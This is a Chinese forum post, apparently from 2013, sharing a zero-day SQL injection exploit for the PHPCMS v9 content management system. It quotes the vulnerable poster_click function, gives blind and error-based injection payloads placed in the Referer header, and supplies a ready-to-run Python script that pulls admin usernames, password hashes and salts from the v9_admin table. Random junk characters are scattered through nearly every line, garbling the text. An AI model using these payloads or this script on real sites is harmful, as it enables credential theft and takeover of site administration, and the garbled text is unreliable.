有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:4 h" y' M/ E: D5 i( P* |
5 K5 q; h, {! @
问题函数\phpcms\modules\poster\index.php
. R) w# }5 v3 c7 i& B c$ a
% n4 ~0 b' ]- u9 spublic function poster_click() {+ G) ?* C3 B/ U9 O7 W1 U( N
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
8 K2 r+ U, o# A2 {$ Y& F. e$ c% a$r = $this->db->get_one(array('id'=>$id));6 O1 a- n, r4 e4 C% }& L/ D0 y6 G0 ]
if (!is_array($r) && empty($r)) return false;
; `2 K3 v, v3 L1 _ J" ~! _! F$ip_area = pc_base::load_sys_class('ip_area');
+ S1 }- H% {( O- @, x$ip = ip();
, _& y/ q) y8 W% D$area = $ip_area->get($ip);
9 A0 N# Y6 G, a2 d0 ]5 T$username = param::get_cookie('username') ? param::get_cookie('username') : '';7 g/ `& g% h1 U' j: ]& m
if($id) { v* ~+ c' ]- R/ y
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
0 v: L9 [% \ @9 S/ p- T' B$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));% |$ `+ @ f# h) q! y0 `; F
}2 {6 a1 a( g' u" s; p, f
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
9 j* }2 [4 v/ |; ~# c4 d$setting = string2array($r['setting']);
8 h! h8 M1 j, I6 jif (count($setting)==1) {0 ^& P* _+ V, Y& @- e2 |# u2 X
$url = $setting['1']['linkurl'];
4 N* `2 A9 d' q/ I, T: z# s} else {
% M) L- ^1 ~% Z+ v! ]$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];8 X, R' H Y" m/ n0 a
}7 N* t# ~0 n+ |; R. D/ S% f5 z
header('Location: '.$url);
9 n' A; U/ s" k: f3 @}
: `- _# U" N6 [% z: r/ C: c
, [( ]* z, }) T5 X, Q7 Z
2 |5 @) e9 Z- o5 D# C% H' c
[8 }( j8 i& k利用方式:+ Z. w" X9 b; k' @
h9 u! w0 O; q+ m; O
1、可以采用盲注入的手法:- _5 F* |" L! w4 u( D: Y9 j" N
# u) T$ l$ r4 K) W% P. @1 y) ^
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
: L1 D, g* e0 U4 ?4 J0 u( W# j, {4 T m9 N. R6 U
通过返回页面,正常与否一个个猜解密码字段。
; d. F! M$ v6 T$ G- V
6 o, y6 ]+ y8 y) y2、代码是花开写的,随手附上了:. r1 @! m, l2 d8 H
5 E- T* o1 t' @0 ~! [1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#: v) o; o! N+ d* p. R R0 w: w( F+ `6 J
8 d! D5 k, w1 Y" g
此方法是爆错注入手法,原理自查。
' r7 ]/ ]% N2 |- [' D; r8 m* f; F6 q+ e1 Y$ W& \' C* a1 `
% z2 x, |/ K% H, {1 O% W* i
/ y$ [# V) U# _$ G8 n利用程序:
% H* B7 k6 y" C4 y6 R. V7 C- E3 W6 T% B- ]% D; I' @; y4 m$ m
#!/usr/bin/env python/ l4 G1 o" h t+ p# T
import httplib,sys,re: | G4 q/ r, ?. i6 h# _* P) o
& |; j7 Q2 O6 ~" k- d- W
def attack():, `* d# i) N, Y3 T- }. n. F
print “Code by Pax.Mac Team conqu3r!”
# A5 Z0 z: l( ?: f Aprint “Welcome to our zone!!!”
2 v1 [. g S% Z+ R5 w9 Kurl=sys.argv[1]
+ ^+ {& e: R7 t" k, o) Fpaths=sys.argv[2]
' v6 K: s! i0 `0 m0 d! Sconn = httplib.HTTPConnection(url)# a. m/ q5 f& |3 X6 A0 G% }
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
$ L/ z7 d2 \' t) N( a6 K“Accept”: “text/plain”,8 Q9 V, Y4 Y+ a( y
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}+ n3 @% M6 S4 l# e. v; S0 T
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers): d# v3 ~6 H. f, T8 D
r1 = conn.getresponse()8 L# y7 w- u1 h9 g5 N
datas=r1.read()
! w) |, k: L. @* l5 O" e* Z2 W/ Qdatas=re.findall(r”Duplicate entry \’\w+’”, datas)( W2 U( i! G, c, L
print datas[0]
' e9 z) s9 Q! N! }; m& i5 Uconn.close()
' W! w4 P3 x5 B2 @- I) f& }$ Vif __name__==”__main__”:& e2 _2 o# _$ e% d+ ^
if len(sys.argv)<3:; S1 _$ }" ~; T9 m% b6 s/ [3 n
print “Code by Pax.Mac Team conqu3r”5 @+ r$ e) `/ `0 q' v
print “Usgae:”) F6 r [& t6 x5 A7 f/ ^! [8 Y! V
print “ phpcmsattack.py www.paxmac.org /”
; ?" G( w. Q! q% q; L+ C: _print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”* o) c( h& G1 y* j, j. h; \! i
sys.exit(1)+ @8 j9 J5 T5 \! d* W
attack()) M0 q8 W3 r) ~& u
7 Z5 f! `2 o/ [1 ?- J- Z |
发表于 2013-1-11 21:01:00
收藏
支持
反对